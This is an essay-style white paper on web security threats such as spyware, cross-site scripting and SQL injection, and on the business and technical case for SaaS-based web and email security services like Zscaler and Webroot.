1. Introduction

The demand for more comprehensive Web security solutions has been fueled by the increasing sophistication of Web-based threats that reach far beyond productivity, bandwidth, and liability issues. The Web has become the new threat vector of choice for hackers and cyber criminals to distribute malware and perpetrate identity theft, financial fraud, and corporate espionage. As a growing number of Web 2.0 applications make their way into the enterprise, they bring with them even more security concerns and attack vectors. Many small and medium-sized business (SMB) organizations lack the in-house capabilities to keep up with the evolving threat landscape. These factors are driving the growing interest in software as a service (SaaS) security.

Spending is going to be affected by this economic slowdown, so organizations need to rethink how they manage non core yet critical tasks such as Web and email security.

There are three truisms about a tight economy that every IT manager knows: ~ Support more projects with fewer people and tighter budgets ~ Approvals for infrastructure build-outs are scarce ~ Ensure employee productivity remains high.

These may seem like Herculean tasks, especially when you're dealing with ever-increasing threats to your Web and email networks

2. Vulnerability of the Web

A growing number of malicious codes are exploiting weaknesses in protocols (e.g., HTTP, POP3, FTP, and HTTPS) and Internet browsers, and infected Web pages are becoming a more prominent way to exploit a site visitor's computer remotely without the visitor even having to physically click on any links or email attachments. The number of Web sites distributing malware has increased explosively as malware creators continue to extend their distribution channels. As a result, Web security is becoming a growing concern for organizations. Web security solutions will therefore play an increasingly important role in ensuring security.

A hack-resilient application is one that reduces the likelihood of a successful attack and mitigates the extent of damage if an attack occurs. A hack-resilient application resides on a secure host (server) in a secure network and is developed using secure design and development guidelines.

Web application security must be addressed across the tiers and at multiple layers. A weakness in any tier or layer makes your application vulnerable to attack.

Web Security Model

2.1 Threats to Enterprise Security

According to an Annual security survey of IT and security professionals, the top 10 threats to a company's network security are as follows:

• Exposure of confidential information -Web email or Web posting (e.g., message board, blog) accounted for 37% of information leaks.

• Trojans, viruses, worms, and other types of malicious code- Virus writers and hackers are increasingly leveraging the popularity of Web 2.0 sites in order to target the greatest number of users.

• Spam uses encryption to hide malicious code and evade detection.

• Spyware secretly monitors the user's behaviors and collect various types of personal information, such as Internet surfing habits, sites that have been visited. This can result in slow connection speeds, different home pages, Theft of confidential information, loss of productivity, consumption of large amounts of bandwidth and corruption of desktops.

• Cross-site Scripting allows code injection by malicious web users into the web pages viewed by other users. Attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user in order to gather data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible.

• SQL Injection happens when a developer accepts user input that is directly placed into a SQL Statement and doesn't properly filter out dangerous characters. This can allow an attacker to not only steal data from your database, but also modify and delete it.

• Content Spoofing is an attack technique used to trick a user into believing that certain content appearing on a web site is legitimate and not from an external source.

With new viruses and malicious Web sites popping up with abandon, IT organizations have had to become security gurus, chasing down signatures piece-meal, pushing out updated policies, and adding to URL blacklists, all while being careful not to hamper user productivity with application downtime and false positives.

3. What is SaaS?

Software as a Service ( SaaS ) is a model of software deployment whereby a provider licenses an application to customers for use as a service on demand.

Traditionally, the user purchases a software package and license by paying a one-time fee. The software thereby becomes the property of the user who made the purchase. Software support and updates are provided by the vendor or developer under the terms of the license agreement.

SaaS, on the other hand, does not have licenses. Rather than a single fee, payment for the use of software is through subscription. The user's access and use of the software ends when he stops paying subscription fees. Moreover, the software is not downloaded to the user's computer. In the example we used, GMail or Hotmail is not "resident" on your computer you access and use it through the Internet but it is not loaded and stored onto your computer.

This enables the organizations to dynamically add or subtract users based on their growth, paying only for what they need, when they need it. Also, because SaaS is essentially a subscription, companies can count application usage as an operating expense as opposed to a complicated—and depreciating—capital expenditure. In fact, one research firm found that a SaaS solution can reduce the annual application cost per user from $100 to $60 versus a traditional appliance based solution.

SaaS Delivery Model

SaaS is often divided into two major categories:

• The so-called " line of business services " which refers to business solutions offered to companies and enterprises, and sold or made available to these enterprises on a subscription basis. Applications covered under this category include business processes such as Supply-Chain management programs, Customer Relations applications and others.
• Customer-oriented services which are offered to the general public either on a subscription basis or offered for free but are supported by advertising. Web-based email services such as Gmail, HotMail fall into this general category.

SaaS also offers companies leverage vs. on-premise solutions because they are based on service level agreements. This key differentiator means that companies have a contract with the service provider to guarantee optimal performance and reliability.

4. SAAS to the rescue

Many IT departments continue to experience budgetary pressures with regard to proper staffing levels while simultaneously being asked to provide higher levels of network accessibility, business continuity, and a higher degree of security. IT departments are tasked with the challenging role of ensuring business continuity even as they are being asked to secure a rapidly increasing pool of protocols (e.g., Web, email, instant messaging) with constrained administration staff sizes. The cost associated with training the IT staff on multiple security consoles can be a burden for corporate IT budgets and staff. This is especially true in the Small and Medium sized business (SMB) environment.

Where the SaaS model really hits home is with Web and email security because it provides IT teams a way to stop threats before they clog—or take down—the network. All vulnerabilities are dealt with in the cloud.

The business benefits of a SaaS security approach include:

• Fixed annual service fees for Web security • Simplified and predictable annual budgeting for security • Reduced administrative workload for security • No need for additional purchase of hardware • No need for software license acquisitions • No implementation costs

The technical benefits of a SaaS security model include:

• Web filtering of traffic that occurs "in the cloud" so that dangerous and unwanted traffic never reaches the business' infrastructure • Maximized network bandwidth that is achieved as a result of the out-of-band elimination of unwanted and dangerous traffic • Centralized and granular security policy management and enforcement • HTTP and FTP traffic scanning and filtering • Up-to-date signature and heuristic-based virus and spyware scanning technologies are applied • URL blocking to manage user browsing • Centralized alerts and reporting • Consistent protection for roaming PCs

SaaS will play a key role in reducing administrative and support costs and, ultimately, in reducing the total cost of ownership (TCO) of managing multiple security technologies. The bottom line from a business perspective and an IT perspective is reducing the cost of managing the perimeter security side of the IT infrastructure. We believe corporations will look for SaaS security solutions that can address both cost and security concerns to an equal degree.

4.1 Convergence of Web and Messaging Security

Because of the blended nature of today's more sophisticated threats, the need for security vendors to address both Web and messaging (WAM) protocols is becoming more critical. Organizations are constantly under pressure to stay ahead of financially motivated cyber criminals launching sophisticated attacks (e.g., blended threats that combine spam, spyware, viruses, malicious URLs, and other malware in their attacks). The ever-changing threat landscape ensures the need for continued investments in security technologies that can address the blended threat environment.

SaaS represents a great opportunity to deliver multi tier protection against blended threats that combine the use of the Web and email as attack vectors. We predict that many organizations, especially SMB environments, will look for solutions that can address both Web and messaging threats.

As SMBs and other businesses continue to look for more cost-effective means of monitoring, protecting and managing their security infrastructures, SaaS offerings will continue to be an attractive option.

4.2 Cutting-edge Tools and Services

• Zscaler SaaS - Zscaler provides risk mitigation and policy enforcement for businesses through its in-the-cloud utility service, while enriching the user's Internet experience. Organizations do not need to purchase, deploy, or manage countless point products. Companies simply define their corporate security control and compliance policy by accessing the Zscaler utility.

Zscaler's in-the-cloud utility enables seamless, appliance-less policy enforcement and malware protection for multiple locations, mobile devices and road warriors.

• Webroot SaaS uses a combination of multiple best-of-breed anti-virus and anti-spam engines as well as its own anti-spyware tool, Spy Sweeper, and an automated threat research system to keep its Web Security and Email Security services cutting edge. Users are also protected by zero-hour heuristic filters that guard against new and unknown virus variants and keep false positives low. And because traffic is filtered through Webroot data centers, distributed denial-of-service attacks can be neutralized before they reach corporate mail servers. Using the multi vendor approach for anti-virus engines also allows Web-root to offer a high-quality, inexpensive SaaS solution without compromising security.

Webroot Spy Sweeper

Webroot Email and Spam Scanner

4.3 SaaS Benefits

SaaS provides a more efficient software application delivery process for Independent Software Vendors (ISVs), Service Providers and End-user Customers.

Service Providers

As a service provider, you can earn 10-50 times more revenue per customer by hosting software applications in addition to infrastructure services. For example, assume you sell $50/month of web hosting to a company with 50 end users. If you up-sell collaboration and inventory management software, you can easily make $20/person for a total of $1,000 per month from the same customer.

SaaS also allows service providers to attract new customers that need software applications but do not have the IT resources or capital budgets to purchase them.

Independent Software Vendors (ISVs)

ISVs have traditionally had difficulty reaching the small and medium sized business market which is served by service providers. The SaaS model provides a new way for ISVs to distribute and market their software.

The benefits include:

• Deployment Costs - software can be deployed into a centralized controlled environment which will reduce help desk calls and support costs
• Upgrades - Customers can be quickly upgraded to the latest releases without the traditional hassles of deployment an installation
• Recurring Revenue - predictable monthly payments provide better stability
• Support - deliver support to service providers instead of end user customers
• Markets - reach small and medium sized businesses which may not have been able to afford or had the expertise to deploy complex applications - reach enterprises who may be willing to purchase a few seats to try your software before doing a full deployment application yourself through the use of Parallels Automation and Virtualization Products.

End Users

The benefits that the SaaS delivery model brings to the end user (individuals, SMBs and corporate clients) are the main driver for companies changing the way they think about software deployment.

Some of these benefits include:

• Financial Benefits - software is subscribed to and not purchased, therefore expenses are not front loaded and are made up of predictable monthly fees
• Ease of Use – access applications anywhere the internet is available through your web browser
• Maintenance - software deployment and maintenance is handled elsewhere - allowing customers to focus on their core competencies to run their business
• Upgrades/Patches – you always get the latest version and security updates; automatically, no need to spend time updating each of your computers
• Centralized Data - all data is centralized into one secure datacenter instead of spread through the world on local PCs and servers
• Uptime - server applications are hosted in a datacenter so power outages and Internet outages are isolated from incidents that affect local offices

4.3 Getting the most from SaaS

Signing on with a software as-a-service (SaaS) provider may have you worried that you are giving up control, but that doesn't have to be the case. Here are some surefire ways to guarantee you stay in the driver's seat.

1. Try before you buy. There's no better way to understand how SaaS will benefit your environment than seeing results for yourself. While this can be cumbersome with appliances and on-premise solutions, SaaS offerings make evaluating the benefits of Web and email security as easy as redirecting your traffic to an alternate URL or altering your MX record. You can even send production traffic through the SaaS provider's environment to check real-time latency and the other impacts on the end-user experience.

2. Get it in writing. The most important part of any SaaS offering is the service level agreement ( SLA ), which outlines your provider's guarantees. You'll want to make sure that the SLA covers performance, uptime, notification of downtime, and other critical factors as well as the repercussions for failing to meet those guarantees. For instance, your provider should offer 24/7 availability. You'll also want a false-positive rate for catching viruses that is lower than 1 in 400,000. To ensure these metrics are being met, have your provider send you regular reports.

3. Know your compliance mandates. When it comes to security, it's imperative that you understand the guidelines for data protection that your company must follow. For example, do you have requirements that dictate how long you have to retain business records or privacy restrictions regarding customer information? Develop policies that reflect these mandates and then convey them to your SaaS provider. Together you'll be able to conduct audits that ensure ongoing compliance.

4. Share your SaaS success. It's easy to measure the success of a SaaS solution. For instance, if your email security solution is stopping 98% of the spam that would otherwise have to be handled by your network, then that's a tremendous savings in terms of bandwidth and server capacity. Or if your Web security service has blocked hundreds of attempts by employees to visit “bad” sites, then you've essentially stopped malware from taking down the network and increased worker productivity. Make sure to share these benefits with corporate executives so they understand the business value of your SaaS decision.

5. Enjoy your newfound freedom. With SaaS, you no longer need a dedicated employee to chase down the latest virus signatures, test and deploy patches, or update URL blacklists. All this is handled automatically as part of your service. You also don't have to spend time purchasing, provisioning and maintaining hardware, software or appliances in-house and at remote locations. This means that you can redeploy staff to more strategic and mission critical tasks.